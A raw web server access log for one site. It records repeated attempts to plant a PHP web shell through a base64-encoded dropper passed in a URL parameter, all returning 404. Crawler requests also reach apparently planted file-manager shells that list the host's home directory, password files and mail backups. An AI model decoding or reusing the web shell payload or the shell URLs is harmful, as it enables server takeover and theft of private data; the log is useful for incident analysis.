216.73.216.189 - - [01/Dec/2025:19:26:13 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.cagefs HTTP/1.1" 200 888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fstraf HTTP/1.1" 200 696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fa3d14 HTTP/1.1" 200 887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2F7709b HTTP/1.1" 200 955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:19:07:15 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:19:07:16 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:19:07:16 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:19:07:17 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:19:07:19 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [01/Dec/2025:19:15:12 +0000] "GET / HTTP/1.1" 200 1496 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:19:15:12 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0"
216.73.216.189 - - [01/Dec/2025:19:27:23 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.subaccounts HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:27:23 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2F.spamassassin HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:29:01 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Faccess-logs HTTP/1.1" 200 1535 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2Fc25fe HTTP/1.1" 200 890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fd4fae%2F.%2Fdoc.php HTTP/1.1" 200 4768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fd4fae%2Fdoc.php HTTP/1.1" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:06 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F.htaccess&path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:18:59:32 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fc25fe HTTP/1.1" 200 890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
150.109.119.38 - - [01/Dec/2025:19:13:44 +0000] "GET /7709b/?path=/home/i442524/public_html/7709b HTTP/1.1" 200 1100 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
194.68.32.135 - - [01/Dec/2025:19:25:34 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:25:34 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2692.17 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:19:27:23 +0000] "GET /29b99/?path=%2F%2Fhome3 HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:27:23 +0000] "GET /dfb27f996d.php?path=%2F%2Ftmp HTTP/1.1" 200 930 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:29:00 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.bash_logout HTTP/1.1" 200 941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:26:13 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 1872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:27:23 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2F.subaccounts HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:28:26 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2F.razor HTTP/1.1" 200 1052 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:29:00 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.htpasswds HTTP/1.1" 200 683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:19:33:13 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
216.73.216.189 - - [01/Dec/2025:19:42:21 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html HTTP/1.1" 200 1955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:19:43:36 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:19:44:09 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:19:44:09 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
17.241.75.100 - - [01/Dec/2025:19:46:39 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.75.100 - - [01/Dec/2025:19:46:40 +0000] "GET /29b99/?path=/home HTTP/1.1" 200 942 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.189 - - [01/Dec/2025:19:29:00 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 1782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:19:33:28 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:19:33:28 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
216.73.216.189 - - [01/Dec/2025:19:41:55 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html%2F19055 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:41:55 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fassets HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:19:43:36 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:19:46:57 +0000] "GET /d4fae/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fd4fae%2F.%2F. HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:19:52:09 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:52:09 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:19:29:01 +0000] "GET /dfb27f996d.php?path=%2F%2Fsbin HTTP/1.1" 200 2282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:19:33:10 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:19:33:13 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
192.121.16.196 - - [01/Dec/2025:19:33:27 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
43.159.145.153 - - [01/Dec/2025:19:36:06 +0000] "GET /7709b/ HTTP/1.1" 200 1099 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:19:36:16 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F29b99%2F7709b.bkp.php&path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 4220 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:36:16 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fc25fe%2F.htaccess&path=%2Fhome%2Fi442524%2Fpublic_html%2Fc25fe HTTP/1.1" 200 860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:36:16 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F7709b%2Findex.php&path=%2Fhome%2Fi442524%2Fpublic_html%2F7709b HTTP/1.1" 200 2790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:36:17 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F29b99%2Ferror_log&path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 23380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.112.223.135 - - [01/Dec/2025:19:43:34 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
37.112.223.135 - - [01/Dec/2025:19:43:35 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2777.89 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:19:46:57 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fi442524.rcube.db.1748956292.rcube.db.1748956292.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:46:57 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Foffice.rcube.db.1760706847.rcube.db.1760706847.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:19:51:55 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:51:56 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
194.68.32.135 - - [01/Dec/2025:19:51:59 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:19:46:57 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Fi442524.rcube.db.1760706847.rcube.db.1760706847.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:19:46:57 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Forders%40galavista.com_personhood.com_personhood.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
